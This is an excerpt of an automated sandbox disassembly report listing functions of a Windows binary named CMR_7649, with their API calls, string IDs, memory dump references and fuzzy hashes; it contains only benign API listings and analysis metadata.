                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$Directory$CurrentSystem
                                                • String ID: D
                                                • API String ID: 1914653954-2746444292
                                                • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                • String ID: *.*
                                                • API String ID: 1153243558-438819550
                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll
                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                • API String ID: 3832890014-4202584635
                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                • GetFocus.USER32 ref: 0046A0DD
                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessagePost$CtrlFocus
                                                • String ID: 0
                                                • API String ID: 1534620443-4108050209
                                                • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$CreateDestroy
                                                • String ID: ,$tooltips_class32
                                                • API String ID: 1109047481-3856767331
                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                • String ID: 0
                                                • API String ID: 1441871840-4108050209
                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 3631882475-2268648507
                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                • SendMessageW.USER32 ref: 00471740
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                • SendMessageW.USER32 ref: 0047184F
                                                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 4116747274-0
                                                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                • _wcslen.LIBCMT ref: 00461683
                                                • __swprintf.LIBCMT ref: 00461721
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                • GetParent.USER32(?), ref: 004618C3
                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                • String ID: %s%u
                                                • API String ID: 1899580136-679674701
                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: InfoItemMenu$Sleep
                                                • String ID: 0
                                                • API String ID: 1196289194-4108050209
                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0043143E
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                • String ID: (
                                                • API String ID: 3300687185-3887548279
                                                • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1976180769-4113822522
                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                • String ID:
                                                • API String ID: 461458858-0
                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
